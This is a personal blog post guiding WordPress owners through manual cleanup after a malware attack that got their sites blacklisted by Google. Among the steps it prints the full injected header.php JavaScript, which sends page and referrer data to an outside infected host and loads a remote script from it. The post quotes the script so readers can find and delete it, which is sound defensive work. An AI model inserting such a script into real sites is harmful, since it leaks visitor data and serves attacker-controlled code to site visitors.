WordPress Malware – Cleaning Your Site

Well, I'm pissed enough, that I have to write about this. Recently, there has been a huge increase in WordPress sites that have been attacked with malware. Google's response has been to shut down the site, and post it as a site with malware.

I have quite a few WordPress sites, of which GeekGumbo is one, and yes, I recently got shut down by Google, because I had malware on my site, even though my WordPress software and plugins were up-to-date. This posts goes through what I had to do to get rid of the malware, so if one of your sites is hit, this may help you.

Some general thoughts, first, these attacks may have been created by individuals, but the attack itself is done through robots. So even though you clean your site, the robot will come back, and try to attack you again. Second, even though Google has banned your site, Google is a friend that can help you get your site back on-line.

There are several sites on the web the will scan your site and clean it for a fee, just Google "scan my web site for malware", they will scan your site and offer you additional information on what is infected on your site, and ask for the fee to hopefully, fix your problem. I personally don't trust these types of sites, because these sites can easily take your money, and drop another virus on your site, and ask for more money, but these sites can provide you with additional clues to clean out the malware, and its worth using their scanner to see where they have found problems.  A site that was helpful to me was, Sucuri. They scanned my site, and gave me helpful information to fix my site.

If you don't want to pay them money, and you're like me, you want to go through the steps to know how your site is getting hacked, or you're not sure you trust someone else on your site, then read on for how to clean your site manually.

To clean your site, you will need to have access to your server's cpanel, your site's admin panel, and a utility, like FileZilla, to upload files to your server. You'll need to edit files on your server in the public_html folder, and work with the database on the server. And you'll have to make changes to your admin panel. I will walk you through the process, but if I just overwhelmed you, by all means go pay one of the malware fix it sites to clean your site.

Ok let's get started.

1. Gather information about the malware. Go to the Google page that is shown on the malware page for your site. Google will list files and possible infections. Scan your site with one of the scanner sites, and write down the clues to where the malware is on your site. Call up your server technical support, and ask them where the problem is. They can at least overwrite all you core WordPress files to eliminate any infection in areas not in the "wp-content" folder.  Keep notes of whatever information you gather as your going through the process to refer to as you fix your problems.

Infections can come from files and folders uploaded to the site by someone who's cracked your site password, or admin privileges, or altered files on your site with infections in them, or added content spam.

My disclaimer

I am not responsible if your site gets hosed by doing any of the below, or if anything bad happens to your site. Your doing this to your site, not me. You have total responsibility for your site. If you don't want to do something, don't do it. OK, let's go get 'em!

Step-by-step

Log into your site's admin panel. Google only blocks your site if you use their search to find your site, so type in http://www.yoursite.com/wp-admin and log into your admin panel.

1. In the menu sidepanel, go to all users. When the panel opens, in the top of the listing, click on "Administrator." If you find any administrators that don't belong, mouse over the icon of the listing and delete the listing.

2. Change your password, and make it a strong password. Under user's go to your profile, and any of other administrator accounts you have, edit the profile, scan down the page, at the bottom, it says "New Password" with a button that says "Generate Password." Click the button, and a field will populate with an obscure password in it. You can delete this long password and add your own. Be careful, if you use this password, you better write it down, or you won't be able to get into your site. After you type in the new password, and your sure you know what it is, click "Update Profile."

Next we'll turn off comments.

3. In the admin panel, under comments, trash any comments you find that are spam.

4. Go to Settings->discussion and uncheck "Allow link notifications from other blogs (pingbacks and trackbacks) on new articles" and "Allow people to post comments on new articles." Make sure you save at the bottom. This will only kill comments to any future posts you write, not existing posts.
5. To kill comments to old posts and pingbacks, go to your server's cpanel, and bring up PHPMyAdmin, go to your database, and click on the wp_posts table. Click on MySQL at the top menu. Use this query:

UPDATE `wp_posts` SET comment_status = 'closed', ping_status= 'closed' WHERE post_status = 'publish'

This will close off any comments and pingbacks to all your existing published posts and pages.

Now that we closed off any comments, there is no reason for anyone to register on your site, so we should shut that down by going to Settings->General, and in the membership section uncheck "Anyone can register," and save at the bottom of the page.

We've locked down your site, now let's clean your site.

In your cpanel on your server bring up the FileManager.

6. Go to the "public_html" folder, open the folder where your WordPress site is located.  If your information search had a particular file with malware, look for that file and delete it.

With lots of caution, delete any folders that look suspicious. Most of your WordPress folders begin with "wp-", if you're not sure if the folder belongs on your site, do not delete it. You can usually see bad folders, they may have porn titles, or questionable content.  Usually bad folders will show up in the malware information you gathered in the first step.

JavaScript <script> viruses

Almost all of your problems will be in the wp-content folder.

OK, We have a tough one to clean next. This is a JavaScript script that substitutes an infected jQuery file for your core jQuery file.  You notice I said substitutes, not overwrites.  So once you clean the virus, your core file will take over again.  We have to clean it up in the file manager, when we're not accessing your site.

The virus drops a script into your "header.php" file, right before the end "</head>" tag.   It loads the infected jQuery file from another infected site after a 10 second delay when you access a page on your site.  On top of that, the jQuery infected file, does something else nasty. It drops this script into the 'header.php" file in every theme you have in the themes folder, and every theme you have on any other WordPress sites you have on your server.  That means if you ever switch themes, you're infected again, and now all your sites are infected, and will be shut down by Google, nasty, nasty, nasty!.

Let's get rid of the JavaScript problem, first and some unsuspecting repercussion from Google.

Open the FileManager on your cpanel on your server, in your WordPress's "wp-content," folder, go to your themes folder.  One-by-one go to each theme folder. and edit the "header.php" file.  Search for "</head>."   Here's what the script looks like:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://[to some site that's infected]/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

Delete the entire script, and make sure you scan all the way down to the end of the file in case its in there more than once.  The script may be in your header.php file several times.  Do this in every theme header.php file on all your WordPress sites.

Google Restoration

Go back to the Google malware page. You may have had malware on all your sites, but unless Google knows that your the owner of all your sites, it will only verify the sites it knows that you're the owner of, and turn that back on.  If you have only one site of three registered, and verified, it will only check the one, and the others will stay malware blocked. So go through the process of verifying all your WordPress sites by uploading the Googel verification file to your site, and then clicking "Verify." Once all your sites are verified in Google, tell Google to rescan your site. And presto with a little delay, your back up and running.

If this virus somehow gets back on your site after this, look to some other sites you have that may be old, non-wordpress sites, and not up to snuff security wise.  If you have not kept your sites up-to-date, the attackers may try to get to your backend threw one of these sites.

This is only one virus we got rid of, admittedly the one going around right now.  There can be more in the future, but at least you can see how to lock down and clean your site.